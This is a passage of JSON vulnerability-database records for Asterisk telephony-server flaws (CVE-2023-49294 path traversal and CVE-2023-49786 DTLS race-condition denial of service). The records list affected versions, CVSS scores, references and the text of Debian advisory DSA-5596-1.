"id": "CVE-2023-49294"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "PACKETSTORM",
"id": "177819"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-49294",
"trust": 2.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020239",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "176383",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "177819",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"id": "VAR-202312-2340",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-03-30T22:40:30.232000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.0
},
{
"problemtype": "Path traversal (CWE-22) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-8857-hfmw-vg8f"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#l3757"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/asterisk"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
},
{
"trust": 0.1,
"url": "https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/{cve_id}\\n\u0027,"
},
{
"trust": 0.1,
"url": "https://asterisk.org/"
},
{
"trust": 0.1,
"url": "https://docs.asterisk.org/asterisk_18_documentation/api_documentation/ami_actions/getconfig/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"date": "2024-01-05T14:31:02",
"db": "PACKETSTORM",
"id": "176383"
},
{
"date": "2024-03-28T14:16:21",
"db": "PACKETSTORM",
"id": "177819"
},
{
"date": "2023-12-14T20:15:52.730000",
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T02:49:00",
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"date": "2023-12-29T00:15:49.930000",
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Path traversal vulnerabilities in products from multiple vendors such as",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "info disclosure",
"sources": [
{
"db": "PACKETSTORM",
"id": "177819"
}
],
"trust": 0.1
}
}
VAR-202312-0487
Vulnerability from variot - Updated: 2024-02-01 22:52Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq
Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033
Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
CVE-2023-37457
The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.
CVE-2023-38703
PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.
CVE-2023-49294
It is possible to read any arbitrary file even when the `live_dangerously`
option is not enabled.
For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.
We recommend that you upgrade your asterisk packages.
For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202312-0487",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "18.20.1"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "19.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "18.9"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "16.8.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "20.5.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "21.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "13.13.0"
},
{
"model": "certified asterisk",
"scope": null,
"trust": 0.8,
"vendor": "sangoma",
"version": null
},
{
"model": "asterisk",
"scope": null,
"trust": 0.8,
"vendor": "digium",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "18.20.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.5.1",
"versionStartIncluding": "19.0.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Debian",
"sources": [
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 0.1
},
"cve": "CVE-2023-49786",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.9,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2023-49786",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-49786",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-49786",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1 security@debian.org\nhttps://www.debian.org/security/ Markus Koschany\nJanuary 04, 2024 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n the available buffer space for storing the new value of a header. By doing\n so this can overwrite memory or cause a crash. This is not externally\n exploitable, unless dialplan is explicitly written to update a header based\n on data from an outside source. If the \u0027update\u0027 functionality is not used\n the vulnerability does not occur. \n\nCVE-2023-38703\n\n PJSIP is a free and open source multimedia communication library written in\n C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n higher level media transport which is stacked upon a lower level media\n transport such as UDP and ICE. Currently a higher level transport is not\n synchronized with its lower level transport that may introduce a\n use-after-free issue. This vulnerability affects applications that have\n SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n transport other than UDP. This vulnerability\u2019s impact may range from\n unexpected application termination to control flow hijack/memory\n corruption. \n\nCVE-2023-49294\n\n It is possible to read any arbitrary file even when the `live_dangerously`\n option is not enabled. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-49786"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-49786",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "176251",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2023/12/15/7",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-024446",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "176383",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"id": "VAR-202312-0487",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-02-01T22:52:28.007000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-362",
"trust": 1.0
},
{
"problemtype": "Race condition (CWE-362) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/176251/asterisk-20.1.0-denial-of-service.html"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2023/dec/24"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"trust": 1.8,
"url": "https://github.com/enablesecurity/advisories/tree/master/es2023-01-asterisk-dtls-hello-race"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-hxj9-xwr8-w8pq"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/asterisk"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-31T00:00:00",
"db": "JVNDB",
